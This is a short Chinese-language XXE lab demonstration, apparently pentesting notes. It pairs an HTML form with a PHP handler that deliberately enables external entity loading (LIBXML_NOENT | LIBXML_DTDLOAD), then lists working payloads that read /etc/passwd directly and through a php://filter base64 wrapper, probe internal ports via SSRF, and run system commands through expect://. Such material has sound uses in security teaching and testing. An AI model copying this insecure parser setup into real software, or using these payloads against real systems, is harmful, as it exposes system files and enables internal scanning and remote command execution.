XXE
XXE
演示代码如下:
<!DOCTYPE html>
<html>
<head>
<title>XXE</title>
<meta charset="utf-8">
<script type="text/javascript">
function xml(){
var x=document.forms["myform"]["xml"].value;
if (x==null||x=="") {
alert("需要输入XML内容");
return false;}}
</script>
</head>
<body >
XML数据
<form name="myform" action="#" onsubmit="return xml()" method="POST">
<textarea rows="10" cols="30" name="xml">
</textarea>
<br>
<input type="submit" value="提交" >
</form>
</body>
</html>
<?php
$xml=$_POST["xml"];
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
//print_r($creds);
$secret = $creds->secret;
if($secret!=""){
echo "<br>解析之后的结果:";
echo $secret;
}
?>
测试 payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE reset [<!ENTITY xxe "Cream_pentester">
]>
<reset><secret>&xxe;</secret></reset>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE reset [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<reset><secret>&xxe;</secret></reset>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE reset [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]>
<reset><secret>&xxe;</secret></reset>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[<!ENTITY xxe SYSTEM "http://ip : 探测端口号/test/">]>
<name>&xxe;</name>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[<!ENTITY xxe SYSTEM "expect://系统命令">]>
<name>&xxe;</name>
php安装expext扩展才能利用